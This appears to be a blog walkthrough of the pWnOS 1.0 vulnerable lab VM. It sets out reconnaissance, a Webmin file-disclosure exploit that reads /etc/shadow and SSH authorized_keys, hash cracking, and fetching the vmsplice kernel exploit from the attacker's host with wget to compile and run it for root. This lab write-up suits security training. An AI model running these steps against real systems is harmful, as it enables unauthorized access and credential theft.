It’s been a long time, since I wrote a blog. I hope this time I continue writing with a machine walk through.

You can easily download image for this VM from vulnhub.

The walk through will be in detail. Let’s start with this machine.

I have already hosted this virtual machine in my vmware workstation. You will prompt with below image once you start machine whether in vmware workstation or in virtual machine.

- 1 - pWnOS: 1.0 Vulnerable Machine Walkthrough
pWnOS machine booted

I have already logged into my Kali machine. Its time to get the IP address of pWnOS machine by a utility prebuilt in Kali i.e. netdiscover as seen below:

- netdiscover pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough
netdiscover

Knowing about the services running on target machine helps to build an attack surface. We use Nmap; a command-line utility to find services running on various ports on target system.

- open ports pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough
nmap

Various ports are open, we see that MiniServ 0.01 (Webmin httpd) server is running on port 10000, after googling I found that the target system is using vulnerable version. Luckily I found an exploit in Metasploit.

- auxiliary module pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough
available exploit

Ist Method

Using the highlighted auxiliary module.

- auxiliary webmin pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough

We see RPATH variable is set to /etc/passwd by default, let’s extract it:

- etc passwd pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough
/etc/passwd

Now set the RPATH variable to /etc/shadow and extract it too:

- etc shadow pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough
/etc/shadow

We got 5 hashes from shadow file, save the hashes in shadow.txt file as shown in command below.

John the ripper; a command-line utility will help to crack them using the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt --fork=5 shadow.txt

Luckily, John cracked 1 out of 5.

- hash cracked pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough

This cracked hash helped us to login via SSH as shown below:

- vmware loggred in pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough

Let’s see what rights/privileges vmware (user) have:

- sudo l pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough

As we saw vmware got no rights/privileges, we further investigate about the kernel.

- kernel version pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough

After googling we found the following exploit for vulnerable version of kernel, you can easily find it in Kali via searchsploit.

Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)

I have started apache2 web server on my kali machine to host this exploit publicly by the following command:

service apache2 start

Copy the exploit to web server.

cp /usr/share/exploitdb/exploits/linux/local/5092.c /var/www/html/

Now download the exploit in victim machine via limited shell and then compile the C program via gcc compiler which is pre-installed in Linux.

wget http://192.168.10.8/5092.c
gcc 5092.c -o exploit
./exploit
- wget exploit pwnos 1 - pWnOS: 1.0 Vulnerable Machine Walkthrough
- gcc exploit pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough
- root pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough

Hurray we got into root 😉

2nd Method

There is another method too. As we came across /etc/passwd, we saw that there were few users mentioned at the very end. Each user can login to pWnOS via SSH. Each user has authorized keys that are present in root directory but in a hidden directory .ssh, let’s get it via RPATH variable.

- authorized keys pwnos - pWnOS: 1.0 Vulnerable Machine Walkthrough
authorized key of vmware user

You might be thinking why we are interested in searching for authorized keys. Well, in this scenario we are lucky enough to have file disclosure vulnerability and we do have access to authorized keys file placed in home directory of each user. Each authorized key is mapped to RSA key.

Now from where to get RSA keys? Good question 😀 Google solved this problem too. Below link has a repository of keys both for 1024 and 2048 bits. But here we need 2048 bits of RSA keys.

https://github.com/offensive-/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

Below command will download the set of RSA keys. I have already downloaded into my Kali machine.

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
- rsa keys - pWnOS: 1.0 Vulnerable Machine Walkthrough

Now extract the file with the following command:

tar vxjf 5622.tar.bz2

Its time for brute forcing (to find the combination of authorized keys and RSA keys).

cd rsa
grep -lr authorized_key
- rsa key - pWnOS: 1.0 Vulnerable Machine Walkthrough

We got it, now login via SSH and run the local Privilege Escalation exploit as we did in Ist method.

ssh -i 2048/d8629ce6dc8f2492e1454c13f46adb26-4566 [email protected]
- root - pWnOS: 1.0 Vulnerable Machine Walkthrough

Hurray we got into root again 😀

If you are interested in reading configuration of SSH Key-Based Authentication on a Linux Server, do read my blog post here.

Thanks for stopping by here, if you like this blog post do leave a comment below.



Source link
Based Blockchain Network

LEAVE A REPLY

Please enter your comment!
Please enter your name here